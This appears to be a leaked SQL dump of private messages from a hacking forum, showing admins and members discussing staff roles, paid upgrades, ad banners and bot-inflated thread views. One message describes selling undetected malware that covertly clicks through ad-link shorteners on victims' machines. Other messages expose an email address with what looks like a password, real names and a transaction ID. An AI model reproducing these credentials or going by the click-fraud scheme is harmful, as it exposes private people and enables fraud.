INSERT INTO mybb_privatemessages VALUES('3437', '258', '258', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '1', 'Re: Forum', '0', '[quote=\'XTr3ME PiX3L\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'XTr3ME PiX3L\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'XTr3ME PiX3L\']\r\nOk mate i registered , if possible i would like to be Moderator or Staff at your forum :)\r\n\r\nIm Deltaforce fromm Ubers.org : http://www.ubers.org/member.php?action=profile&uid=7852\r\n\r\nI have had experience being moderator before at a hacking forum called Eliteguys\r\n\r\nHere is my eliteguys profile : http://www.eliteguys.org/User-XTr3ME-PiX3L\r\n\r\nAs you can see im mod there and i can help your forum grow so i would like to be Moderator or Staff on L33T Hacking :D I swear you will not regret it. I can post MANY HQ stuff there\r\n\r\nhere is my profile on L33T HACKING : http://l33thacking.net/user-258.html\r\n\r\nLooking forward to hearing from you \r\n[/quote]\r\n\r\nhttp://l33thacking.net/misc.php?action=help&hid=17\r\n\r\n\r\n[/quote]\r\n\r\nOk i understand , How about a free upgrade then?\r\n\r\nYou said on ubers that you will provide a free upgrade (VIP membership) if we are active here on this forum\r\n\r\nI am willing to move ALL MY HQ THREADS from ubers to your forum and remain more active here..\r\n\r\nThe reason is that recently Crazy4cs (admin and owner of ubers) made it so that only upgraded members (that\'s like 15 dollars) can edit posts and threads and normal users can\'t\r\n\r\nUbers is all about money now , i id rather be a part of this community instead of ubers\r\n\r\nHow about it then? i can bring alot of Quality to this place i guarantee you , also you said free upgrade :)\r\n[/quote]\r\n\r\n\r\nSure that would be great but before we upgrade someone we now require two HQ threads. \r\n[/quote]\r\n\r\nAlready Done!! , i posted 4 HQ tuts 2 extra :) :\r\n\r\nhttp://l33thacking.net/thread-987.html\r\n\r\nhttp://l33thacking.net/thread-988.html\r\n\r\nhttp://l33thacking.net/thread-989.html\r\n\r\nhttp://l33thacking.net/thread-990.html\r\n[/quote]\r\n\r\nI\'ll do it when I get back home, just PM me back so when I check my PMs I know that I have to upgrade your account.', '1350675908', '0', '3', '1350711090', '1', '0', '0', '1350710742'); INSERT INTO mybb_privatemessages VALUES('3939', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Need image for Advert', '0', '[quote=\'t3h jok3r\']\r\nI need your help in GFX, I have seen couple of your threads on GFX so thought you could help me out. Doesn\'t matter if it\'s professional or not but must look decent. \r\n\r\nI need something like a slogan or something, I will using it to put put ADs on other sites. I need it to say l33thacking and join us OR what L33T Hacking is about. Anything attractive.\r\n\r\nThe size should be 700x90 or anything smaller.\r\n\r\nThanks a bunch.\r\n[/quote]\r\nAny ideas on the slogan?', '1351726957', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3941', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: YouTube', '0', '[quote=\'t3h jok3r\']\r\nThe following video belongs to you. This video is the 2nd result you get when you type in l33t hacking or l33thacking on Google. I was wondering if you could update the URL on the video from .com to .net also fix the link on your adf.ly referral.\r\n[/quote]\r\nFixed link I think. Not sure.', '1351726975', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3943', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??zg???g????61\']\r\n[quote=\'t3h jok3r\']\r\nSup long time no chat.\r\n[/quote]\r\n\r\nYeah man. Sorry about the inactivity. I\'ve been pretty busy. Hows everything?\r\n[/quote]\r\n\r\nNp, everythings cool. The hurricane came by and thank god nothing happen to me or my family. Did it come to your side?\r\n[/quote]\r\n\r\n\r\nYeah but we\'re all good', '1351732353', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3944', '62', '62', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Re: Need image for advert', '0', '[quote=\'R?????zo?\']\r\n[quote=\'t3h jok3r\']\r\nI know you have a busy schedule but I really need help. \r\n\r\nI need something like a slogan or something, I will using it to put put ADs on other sites. I need it to say l33thacking and join us OR what L33T Hacking is about. Anything attractive.\r\n\r\nThe size should be 700x90 or anything smaller.\r\n\r\nThanks a bunch.\r\n[/quote]\r\n\r\ncan this wait 1-2 days? I\'m really busy latetly :/\r\n[/quote]\r\n\r\nyeah sure.', '1351735872', '0', '3', '1352034908', '1', '0', '0', '1351807087'); INSERT INTO mybb_privatemessages VALUES('3910', '228', '1', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: LH site overview', '0', '[quote=\'t3h jok3r\']\r\nI recently posted L33T Hacking on a webmaster forum and some people say that LH is the same like HF. The truth is that I have hidden sections like movie rips, PIDs, Social Engineering etc from guest view because I wanted the bots to approve LH which they have done.\r\n\r\nShould I make the movie rips section, PIDs etc public. By public I mean visible to guests but can\'t view threads. I think this will let them know what different stuff we have and why they should join us. What\'s your opinion?\r\n\r\nSent to NXK and VirtualLegend.\r\n[/quote]\r\n\r\nI think its a good idea to make it public from now. And we need to let people see how we are different than HF! \r\n\r\nI think after 5/6 Months that LH has alot of members :D', '1351632903', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3911', '53', '53', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'Skype', '0', 'Do you have skype? and do i have you already as a contact ?\r\n\r\nSkype: VirtualLegend', '1351634331', '0', '1', '0', '1', '0', '2', '1351701132'); INSERT INTO mybb_privatemessages VALUES('3912', '228', '53', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Skype', '0', 'Do you have skype? and do i have you already as a contact ?\r\n\r\nSkype: VirtualLegend', '1351634331', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3914', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\']\r\nSup long time no chat.\r\n[/quote]\r\n\r\nYeah man. Sorry about the inactivity. I\'ve been pretty busy. Hows everything?', '1351635685', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3915', '53', '53', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'Adfoc.us Views', '0', 'Are you willing to give me any more?\r\n\r\nAlso, if you can, I would appreciate you giving out the source. Like the bot/program or the website. \r\n\r\nWhatever you use to get the Adfoc.us views! :o\r\nI really need this..\r\nI\'ll like share half my profits with you.', '1351636127', '0', '3', '1351701312', '1', '0', '2', '1351701152'); INSERT INTO mybb_privatemessages VALUES('3916', '82', '53', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Adfoc.us Views', '0', 'Are you willing to give me any more?\r\n\r\nAlso, if you can, I would appreciate you giving out the source. Like the bot/program or the website. \r\n\r\nWhatever you use to get the Adfoc.us views! :o\r\nI really need this..\r\nI\'ll like share half my profits with you.', '1351636127', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3917', '160', '160', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"160\";}}', '1', 'Signature', '0', 'Hello Jacob,\r\n\r\nI Have Finally Made your Signature, I Hope you like it. \r\n\r\nSignature:\r\n[url=http://i.imgur.com/GgQJx.jpg]http://i.imgur.com/GgQJx.jpg[/url]', '1351638542', '0', '1', '0', '1', '0', '2', '1351817499'); INSERT INTO mybb_privatemessages VALUES('3918', '228', '160', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"160\";}}', '2', 'Signature', '0', 'Hello Jacob,\r\n\r\nI Have Finally Made your Signature, I Hope you like it. \r\n\r\nSignature:\r\n[url=http://i.imgur.com/GgQJx.jpg]http://i.imgur.com/GgQJx.jpg[/url]', '1351638542', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3922', '62', '62', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Need image for advert', '0', 'I know you have a busy schedule but I really need help. \r\n\r\nI need something like a slogan or something, I will using it to put put ADs on other sites. I need it to say l33thacking and join us OR what L33T Hacking is about. Anything attractive.\r\n\r\nThe size should be 700x90 or anything smaller.\r\n\r\nThanks a bunch.', '1351651991', '0', '3', '1351708362', '1', '0', '0', '1351707966'); INSERT INTO mybb_privatemessages VALUES('3920', '228', '160', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"160\";}}', '2', 'Signature', '0', 'Hello Jacob,\r\n\r\nI Have Finally Made your Signature, I Hope you like it. \r\n\r\nSignature:\r\n[url=http://i.imgur.com/GgQJx.jpg]http://i.imgur.com/GgQJx.jpg[/url]', '1351638544', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3921', '100', '100', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '1', 'Re: Sup', '0', '[quote=\'??zg???g????61\']\r\n[quote=\'t3h jok3r\']\r\nSup long time no chat.\r\n[/quote]\r\n\r\nYeah man. Sorry about the inactivity. I\'ve been pretty busy. Hows everything?\r\n[/quote]\r\n\r\nNp, everythings cool. The hurricane came by and thank god nothing happen to me or my family. Did it come to your side?', '1351648105', '0', '3', '1351732353', '1', '0', '0', '1351732292'); INSERT INTO mybb_privatemessages VALUES('3923', '82', '82', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Need image for Advert', '0', 'I need your help in GFX, I have seen couple of your threads on GFX so thought you could help me out. Doesn\'t matter if it\'s professional or not but must look decent. \r\n\r\nI need something like a slogan or something, I will using it to put put ADs on other sites. I need it to say l33thacking and join us OR what L33T Hacking is about. Anything attractive.\r\n\r\nThe size should be 700x90 or anything smaller.\r\n\r\nThanks a bunch.', '1351652070', '0', '3', '1351726957', '1', '0', '0', '1351713439'); INSERT INTO mybb_privatemessages VALUES('3924', '82', '82', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'YouTube', '0', 'The following video belongs to you. This video is the 2nd result you get when you type in l33t hacking or l33thacking on Google. I was wondering if you could update the URL on the video from .com to .net also fix the link on your adf.ly referral.', '1351655461', '0', '3', '1351726975', '1', '0', '0', '1351713422'); INSERT INTO mybb_privatemessages VALUES('3925', '228', '228', '302', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Question', '0', 'In the givaways section may i post a free hosting thread?\r\nAlso can i have a link to the rules?', '1351697238', '0', '1', '0', '0', '0', '2', '1351697254'); INSERT INTO mybb_privatemessages VALUES('3926', '302', '228', '302', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Question', '0', 'In the givaways section may i post a free hosting thread?\r\nAlso can i have a link to the rules?', '1351697238', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3927', '302', '302', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"302\";}}', '1', 'Awnser', '0', 'Hi,\r\n\r\nWhat you can do is, that you will choose random a member that posted on your thread that he want to join the giveaway after 3/4 days.\r\n\r\nHelp Section: [url=http://l33thacking.net/misc.php?action=help]http://l33thacking.net/misc.php?action=help [/url]', '1351697448', '0', '3', '1351698043', '1', '0', '2', '1351697589'); INSERT INTO mybb_privatemessages VALUES('3928', '228', '302', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"302\";}}', '2', 'Awnser', '0', 'Hi,\r\n\r\nWhat you can do is, that you will choose random a member that posted on your thread that he want to join the giveaway after 3/4 days.\r\n\r\nHelp Section: [url=http://l33thacking.net/misc.php?action=help]http://l33thacking.net/misc.php?action=help [/url]', '1351697448', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3929', '228', '228', '302', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: Awnser', '0', '[quote=\'VirtualLegend\']\r\nHi,\r\n\r\nWhat you can do is, that you will choose random a member that posted on your thread that he want to join the giveaway after 3/4 days.\r\n\r\nHelp Section: [url=http://l33thacking.net/misc.php?action=help]http://l33thacking.net/misc.php?action=help [/url]\r\n[/quote]\r\nThanks !!!', '1351698043', '0', '1', '0', '0', '0', '2', '1351700361'); INSERT INTO mybb_privatemessages VALUES('3930', '302', '228', '302', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Awnser', '0', '[quote=\'VirtualLegend\']\r\nHi,\r\n\r\nWhat you can do is, that you will choose random a member that posted on your thread that he want to join the giveaway after 3/4 days.\r\n\r\nHelp Section: [url=http://l33thacking.net/misc.php?action=help]http://l33thacking.net/misc.php?action=help [/url]\r\n[/quote]\r\nThanks !!!', '1351698043', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3931', '82', '82', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Re: Adfoc.us Views', '0', '[quote=\'iTzIpod\']\r\nAre you willing to give me any more?\r\n\r\nAlso, if you can, I would appreciate you giving out the source. Like the bot/program or the website. \r\n\r\nWhatever you use to get the Adfoc.us views! :o\r\nI really need this..\r\nI\'ll like share half my profits with you.\r\n[/quote]\r\nI have 2 ways. I use the second way for my customers. I have a programm (7 USD at HF) which lets you make a \"virus\"(undetected) the virus opens all the adf.ly or adfoc.us links in the background and clicks on forward/skip. Then it changes the ip of the person and then restarts. Simple but effective.\r\n\r\n', '1351701312', '0', '3', '1351726933', '1', '0', '2', '1351713398'); INSERT INTO mybb_privatemessages VALUES('3932', '53', '82', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Adfoc.us Views', '0', '[quote=\'iTzIpod\']\r\nAre you willing to give me any more?\r\n\r\nAlso, if you can, I would appreciate you giving out the source. Like the bot/program or the website. \r\n\r\nWhatever you use to get the Adfoc.us views! :o\r\nI really need this..\r\nI\'ll like share half my profits with you.\r\n[/quote]\r\nI have 2 ways. I use the second way for my customers. I have a programm (7 USD at HF) which lets you make a \"virus\"(undetected) the virus opens all the adf.ly or adfoc.us links in the background and clicks on forward/skip. Then it changes the ip of the person and then restarts. Simple but effective.\r\n\r\n', '1351701312', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3934', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Need image for advert', '0', '[quote=\'t3h jok3r\']\r\nI know you have a busy schedule but I really need help. \r\n\r\nI need something like a slogan or something, I will using it to put put ADs on other sites. I need it to say l33thacking and join us OR what L33T Hacking is about. Anything attractive.\r\n\r\nThe size should be 700x90 or anything smaller.\r\n\r\nThanks a bunch.\r\n[/quote]\r\n\r\ncan this wait 1-2 days? I\'m really busy latetly :/', '1351708362', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3935', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '1', 'You have been granted an award.', '0', 'Hi [b]HoverCatz[/b] You have been granted an award on [url=http://l33thacking.net][b]L33T Hacking[/b][/url] We thank you to not respond to this PM.\r\n\r\n-----------------------------\r\n\r\nName of award: Cheers on 100\r\nDescription: User has reached 100 posts\r\n\r\n-----------------------------\r\n\r\nThe award you have been given in an automatic way to remove it or hide it from your postbit / profile go to control panel and edit them.\r\n', '1351708621', '0', '1', '0', '1', '0', '0', '1351708688'); INSERT INTO mybb_privatemessages VALUES('3936', '53', '53', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'Re: Adfoc.us Views', '0', '[quote=\'sirchamp\']\r\n[quote=\'iTzIpod\']\r\nAre you willing to give me any more?\r\n\r\nAlso, if you can, I would appreciate you giving out the source. Like the bot/program or the website. \r\n\r\nWhatever you use to get the Adfoc.us views! :o\r\nI really need this..\r\nI\'ll like share half my profits with you.\r\n[/quote]\r\nI have 2 ways. I use the second way for my customers. I have a programm (7 USD at HF) which lets you make a \"virus\"(undetected) the virus opens all the adf.ly or adfoc.us links in the background and clicks on forward/skip. Then it changes the ip of the person and then restarts. Simple but effective.\r\n\r\n\r\n[/quote]\r\n\r\nOo.\r\nWill you give it to me? :p \r\n\r\nUmm\r\nCan you get me more views?\r\nSame information \r\n\r\niTzIpod@hotmail.com:Moneymaking\r\n:D \r\nThanks. Paying you more money.', '1351726933', '0', '1', '0', '1', '0', '2', '1351779866'); INSERT INTO mybb_privatemessages VALUES('3886', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Views', '0', '[quote=\'t3h jok3r\']\r\nHi,\r\n\r\nDid you bot views on your adfocus thread? I would like you to be honest.\r\n[/quote]\r\nNo. Im also surprised. ', '1351537450', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3887', '53', '53', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'Re: Views', '0', '[quote=\'sirchamp\']\r\n[quote=\'t3h jok3r\']\r\nHi,\r\n\r\nDid you bot views on your adfocus thread? I would like you to be honest.\r\n[/quote]\r\nNo. Im also surprised. \r\n[/quote]\r\n\r\nAre you sure because then I will have to investigate and if it\'s only on your thread then you botted your thread views and lied to me. If you are honest then I promise I will not do anything to you. So please verify.', '1351537519', '0', '3', '1351537631', '1', '0', '0', '1351537526'); INSERT INTO mybb_privatemessages VALUES('3889', '53', '53', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'Re: Views', '0', '[quote=\'sirchamp\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'sirchamp\']\r\n[quote=\'t3h jok3r\']\r\nHi,\r\n\r\nDid you bot views on your adfocus thread? I would like you to be honest.\r\n[/quote]\r\nNo. Im also surprised. \r\n[/quote]\r\n\r\nAre you sure because then I will have to investigate and if it\'s only on your thread then you botted your thread views and lied to me. If you are honest then I promise I will not do anything to you. So please verify.\r\n[/quote]\r\nWhen I say no I mean no. What is if the only reason is that it has so many views because its popular?! And I dont really think that its a big deal.\r\n[/quote]\r\n\r\nFor you it\'s just popularity but for me it\'s a big deal because L33T Hacking will get banned again, it overloads over server which acts like a DDoS attack, my hosting will suspend the account and more. \r\n\r\n', '1351537756', '0', '1', '0', '1', '0', '0', '1351538627'); INSERT INTO mybb_privatemessages VALUES('3891', '302', '1', '302', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'How i found HF', '0', 'Someone posted it on forumcore.net I\'m a contributer there name is TreeJay.', '1351540502', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3893', '302', '302', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"302\";}}', '1', 'Re: How i found HF', '0', '[quote=\'Mac Miller\']\r\nSomeone posted it on forumcore.net I\'m a contributer there name is TreeJay.\r\n[/quote]\r\n\r\nThat was me. Thanks for signing up and hope you enjoy your stay on L33T Hacking.', '1351552211', '0', '1', '0', '1', '0', '0', '1351554299'); INSERT INTO mybb_privatemessages VALUES('3895', '302', '1', '302', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Question about Elite', '0', 'hey i noticed it\'s a donation but does it have to be minimum of $5 for elite cause currently all i got it $2 :(', '1351596607', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3898', '302', '302', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"302\";}}', '1', 'Re: Question about Elite', '0', '[quote=\'Mac Miller\']\r\nhey i noticed it\'s a donation but does it have to be minimum of $5 for elite cause currently all i got it $2 :(\r\n[/quote]\r\n\r\nYes that\'s correct. The upgrade price is $5 but since you are from forumcore I can make it $2 for you.\r\n\r\nJust go on the upgrade page, replace the 5 with 2 and click buy now.', '1351619990', '0', '3', '1351621224', '1', '0', '0', '1351620963'); INSERT INTO mybb_privatemessages VALUES('3900', '302', '1', '302', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Question about Elite', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Mac Miller\']\r\nhey i noticed it\'s a donation but does it have to be minimum of $5 for elite cause currently all i got it $2 :(\r\n[/quote]\r\n\r\nYes that\'s correct. The upgrade price is $5 but since you are from forumcore I can make it $2 for you.\r\n\r\nJust go on the upgrade page, replace the 5 with 2 and click buy now.\r\n[/quote]\r\n\r\n48Y76765KV292333W.\r\nthat transaction id and thanks man :)', '1351621224', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3901', '302', '302', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"302\";}}', '1', 'You have been granted an award.', '0', 'Hi [b]Mac Miller[/b] You have been granted an award on [url=http://l33thacking.net][b]L33T Hacking[/b][/url] We thank you to not respond to this PM.\r\n\r\n-----------------------------\r\n\r\nName of award: Elite\r\nDescription: Special Award to signify Elite Status\r\n\r\n-----------------------------\r\n\r\nThe award you have been given in an automatic way to remove it or hide it from your postbit / profile go to control panel and edit them.\r\n', '1351621456', '0', '1', '0', '1', '0', '0', '1351622116'); INSERT INTO mybb_privatemessages VALUES('3902', '302', '302', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"302\";}}', '1', 'Re: Question about Elite', '0', '[quote=\'Mac Miller\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Mac Miller\']\r\nhey i noticed it\'s a donation but does it have to be minimum of $5 for elite cause currently all i got it $2 :(\r\n[/quote]\r\n\r\nYes that\'s correct. The upgrade price is $5 but since you are from forumcore I can make it $2 for you.\r\n\r\nJust go on the upgrade page, replace the 5 with 2 and click buy now.\r\n[/quote]\r\n\r\n48Y76765KV292333W.\r\nthat transaction id and thanks man :)\r\n[/quote]\r\n\r\nNo problem. Thanks for upgrading and hope you enjoy your upgrade and Elite award.', '1351621484', '0', '1', '0', '1', '0', '0', '1351622086'); INSERT INTO mybb_privatemessages VALUES('3903', '61', '61', '1', 'a:1:{s:2:\"to\";a:2:{i:0;s:2:\"61\";i:1;s:3:\"228\";}}', '1', 'LH site overview', '0', 'I recently posted L33T Hacking on a webmaster forum and some people say that LH is the same like HF. The truth is that I have hidden sections like movie rips, PIDs, Social Engineering etc from guest view because I wanted the bots to approve LH which they have done.\r\n\r\nShould I make the movie rips section, PIDs etc public. By public I mean visible to guests but can\'t view threads. I think this will let them know what different stuff we have and why they should join us. What\'s your opinion?\r\n\r\nSent to NXK and VirtualLegend.', '1351622697', '0', '3', '1351624567', '1', '0', '0', '1351624535'); INSERT INTO mybb_privatemessages VALUES('3904', '228', '228', '1', 'a:1:{s:2:\"to\";a:2:{i:0;s:2:\"61\";i:1;s:3:\"228\";}}', '1', 'LH site overview', '0', 'I recently posted L33T Hacking on a webmaster forum and some people say that LH is the same like HF. The truth is that I have hidden sections like movie rips, PIDs, Social Engineering etc from guest view because I wanted the bots to approve LH which they have done.\r\n\r\nShould I make the movie rips section, PIDs etc public. By public I mean visible to guests but can\'t view threads. I think this will let them know what different stuff we have and why they should join us. What\'s your opinion?\r\n\r\nSent to NXK and VirtualLegend.', '1351622697', '0', '3', '1351632903', '1', '0', '0', '1351632775'); INSERT INTO mybb_privatemessages VALUES('3906', '228', '228', '61', 'a:1:{s:2:\"to\";a:2:{i:0;s:1:\"1\";i:1;s:3:\"228\";}}', '1', 'Re: LH site overview', '0', '[quote=\'t3h jok3r\']\r\nI recently posted L33T Hacking on a webmaster forum and some people say that LH is the same like HF. The truth is that I have hidden sections like movie rips, PIDs, Social Engineering etc from guest view because I wanted the bots to approve LH which they have done.\r\n\r\nShould I make the movie rips section, PIDs etc public. By public I mean visible to guests but can\'t view threads. I think this will let them know what different stuff we have and why they should join us. What\'s your opinion?\r\n\r\nSent to NXK and VirtualLegend.\r\n[/quote]\r\n\r\nSure, Hopefully it would bring in new members.', '1351624567', '0', '1', '0', '1', '0', '2', '1351632741'); INSERT INTO mybb_privatemessages VALUES('3907', '61', '228', '61', 'a:1:{s:2:\"to\";a:2:{i:0;s:1:\"1\";i:1;s:3:\"228\";}}', '2', 'Re: LH site overview', '0', '[quote=\'t3h jok3r\']\r\nI recently posted L33T Hacking on a webmaster forum and some people say that LH is the same like HF. The truth is that I have hidden sections like movie rips, PIDs, Social Engineering etc from guest view because I wanted the bots to approve LH which they have done.\r\n\r\nShould I make the movie rips section, PIDs etc public. By public I mean visible to guests but can\'t view threads. I think this will let them know what different stuff we have and why they should join us. What\'s your opinion?\r\n\r\nSent to NXK and VirtualLegend.\r\n[/quote]\r\n\r\nSure, Hopefully it would bring in new members.', '1351624567', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3908', '100', '100', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '1', 'Sup', '0', 'Sup long time no chat.', '1351628407', '0', '3', '1351635685', '1', '0', '0', '1351635651'); INSERT INTO mybb_privatemessages VALUES('3445', '257', '257', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Hi`', '0', 'Hi,\r\n\r\nI was wondering can you please change your username as it gives LH a bad name, your profile might be cached by google and since it has the word \"troll\" it will basically give bad reviews regarding our site.', '1350680992', '0', '3', '1350681023', '1', '0', '0', '1350681001'); INSERT INTO mybb_privatemessages VALUES('3447', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hi`', '0', '[quote=\'t3h jok3r\']\r\nHi,\r\n\r\nI was wondering can you please change your username as it gives LH a bad name, your profile might be cached by google and since it has the word \"troll\" it will basically give bad reviews regarding our site.\r\n[/quote]\r\n\r\nOK SURE SORRY', '1350681023', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3448', '257', '257', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: Hi`', '0', '[quote=\':)TROLLED:)\']\r\n[quote=\'t3h jok3r\']\r\nHi,\r\n\r\nI was wondering can you please change your username as it gives LH a bad name, your profile might be cached by google and since it has the word \"troll\" it will basically give bad reviews regarding our site.\r\n[/quote]\r\n\r\nOK SURE SORRY\r\n[/quote]\r\n\r\nIt\'s OK and thanks for replying back.', '1350681077', '0', '3', '1350681181', '1', '0', '0', '1350681170'); INSERT INTO mybb_privatemessages VALUES('3450', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hi`', '0', '[quote=\'t3h jok3r\']\r\n[quote=\':)TROLLED:)\']\r\n[quote=\'t3h jok3r\']\r\nHi,\r\n\r\nI was wondering can you please change your username as it gives LH a bad name, your profile might be cached by google and since it has the word \"troll\" it will basically give bad reviews regarding our site.\r\n[/quote]\r\n\r\nOK SURE SORRY\r\n[/quote]\r\n\r\nIt\'s OK and thanks for replying back.\r\n[/quote]\r\n\r\nCHANGED', '1350681181', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3451', '62', '62', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Re: Unique group', '0', '[quote=\'R?????zo?\']\r\njust curious if you would be interested in joining Unique, it\'s an invite only group, we could use you there :)\r\n[/quote]\r\n\r\nI would love too bro\r\n\r\nThanks for the invite', '1350683860', '0', '1', '0', '1', '0', '2', '1350722853'); INSERT INTO mybb_privatemessages VALUES('3452', '228', '62', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Re: Unique group', '0', '[quote=\'R?????zo?\']\r\njust curious if you would be interested in joining Unique, it\'s an invite only group, we could use you there :)\r\n[/quote]\r\n\r\nI would love too bro\r\n\r\nThanks for the invite', '1350683860', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3453', '3', '3', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'me', '0', 'hey it\'s logan\r\n\r\n[8:11:11 PM] ??????????¢™: Logan thats you?\r\n[8:11:16 PM] Logan Turner: oui\r\n[8:11:20 PM] ??????????¢™: ?\r\n[8:11:23 PM] Logan Turner: yes\r\n[8:11:33 PM] ??????????¢™: lie\r\n[8:11:55 PM] ??????????¢™: Go to my profile then NXK\r\nBreShiE\r\nKasual\r\nLewis Carhart', '1350691900', '0', '1', '0', '1', '0', '2', '1350691920'); INSERT INTO mybb_privatemessages VALUES('3454', '61', '3', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '2', 'me', '0', 'hey it\'s logan\r\n\r\n[8:11:11 PM] ??????????¢™: Logan thats you?\r\n[8:11:16 PM] Logan Turner: oui\r\n[8:11:20 PM] ??????????¢™: ?\r\n[8:11:23 PM] Logan Turner: yes\r\n[8:11:33 PM] ??????????¢™: lie\r\n[8:11:55 PM] ??????????¢™: Go to my profile then NXK\r\nBreShiE\r\nKasual\r\nLewis Carhart', '1350691900', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3455', '3', '3', '270', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'faggy', '0', 'faggot\r\nI was joking.', '1350693196', '0', '1', '0', '1', '0', '0', '1350693217'); INSERT INTO mybb_privatemessages VALUES('3456', '270', '3', '270', 